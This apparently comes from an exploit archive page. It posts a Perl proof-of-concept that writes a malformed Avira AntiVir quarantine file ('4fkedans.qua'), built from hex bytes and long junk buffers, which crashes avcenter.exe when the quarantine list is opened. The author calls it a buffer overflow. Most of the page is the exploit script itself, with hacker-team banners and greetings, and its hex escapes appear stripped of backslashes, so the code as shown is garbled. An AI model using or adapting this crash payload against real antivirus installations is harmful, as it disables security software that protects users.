Home / os / win7

Avira AntiVirus QUA File Crash

Posted on 22 February 2011

#!/usr/bin/perl #================================================================================= | #| # Title : Avira AntVir QUA file in ( avcenter.exe) Local Crash PoC | #| # Author : KedAns-Dz | #| # email : Ked-h@hotmail.com | #| # Home : HMD/AM (30500/04300) - Algeria -(00213555248701) | #| # Web Site : /(~_-) ... | #| # Tested on : windows XP SP3 Français & Arabic | #| # Target SFW : Avira Anti Virus Version 10.00.12.28 | #| # Info : Copy the QUA file in : | # ....All UsersApplication DataAviraAntiVir DesktopINFECTED | # > You are Opening The avcenter.exe and show Quarantine list | # the avcenter is Task kill and Show Crash Error | #====================== Exploit By KedAns-Dz ================================= | # Perl File : #---------------------------------- #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " ". " ||========================================|| ". " || || ". " || Avira AntVir Local Crash PoC || ". " || Exploit Buffer Overflow || ". " || Created BY KedAns-Dz || ". " || ked-h(at)hotmail(dot)com || ". " || || ". " ||========================================|| "; sleep(2); print " "; my $Buf = "x41x6ex74x69x56x69x72x20x51x75x61x00x00x00x00x00". "x46x01x00x00x6ax00x00x00x00x00x00x00x01x00x00x00". "x00x00x00x00x01x00x00x00x05x00x00x00x01x00x00x00". "x00x00x00x00x28x00x00x02x00x00x0ex04x69x4cx00x00". "x00x00x00x00x00x00x00x00x00x00x08x00x00x00x02x00". "x00x07x00x00x00x42". "x00" x 51 . "x4bx65x64x40x41x6ex73x2fx41x76x32x42x6fx46x2ex50x6cx7c". # Infected Name "x31" x 378 . # Bad Multi Number "x00" x 48 . "x5cx00x5cx00x3fx00x5cx00x43x00x3ax00x5cx00x4bx00x2ex00x44x00x7a" . # Path V-Qua "x41" x 380 ; # Junk $file = "4fkedans.qua"; open (F ,">$file"); print F $Buf; sleep (2); print " Creat File : $file , Succesfully ! "; close (F); #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================| #[»] Team : [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers < | # Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz | # Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends .. | #------------------------------------------------------------------------------|

 

TOP